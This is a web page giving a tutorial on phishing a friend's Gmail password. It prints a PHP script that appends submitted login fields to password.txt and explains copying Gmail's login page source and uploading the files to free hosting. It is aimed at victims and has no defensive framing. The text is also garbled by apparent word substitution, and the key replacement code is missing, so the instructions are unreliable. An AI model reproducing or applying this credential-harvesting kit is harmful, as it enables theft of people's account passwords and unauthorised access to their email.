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How to Hack Gmail Account Password Aditya Illusion rwxr-xr-x 1 01.04

Filename How to Hack Gmail Account Password
Permission rw-r--r--
Author Aditya Illusion
Date and Time 01.04
his is one of the best mode to hack gmail  password.This will work only if your friend don’t know about this mode of hacking gmail.
For this We need three files:

1.Fake gmail login page
2.Php file
3.Text file to pile password

Start your php file

1.Open notepad and copy this code:

header (“Place:”);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $wavering => $regard) {
fwrite($handle, $wavering);
fwrite($handle, “=”);
fwrite($handle, $regard);
fwrite($handle, “rn”);
fwrite($ handle, “rn”);
fclose($handle) ;

2.Now save this as gmailphishing.php
Your php file is now made
If you Don’t know what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt

Start gmail fake login page

Now  go to and aptly click / View Source.Copy source in notepad and save it as gmaillogin.html .Now open source code of this html file
We need to find the place everywhere Login  code in gmail page that everywhere send the user with clicking on it.
Now Press crtl-f with notch source code and   quest for this code
proceedings=no matter what business.
In this case we have this


We replace that part with:


Save your gmailfake.html file

Text file

Start a bemused text file and name it password.txt

Now upload all the three files gmailfake.html,gmailphishing.php,Password.txt in any free web hosting site directory like and now you can just check your fake gmail login page by inane to for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is made,In which the password is stored.

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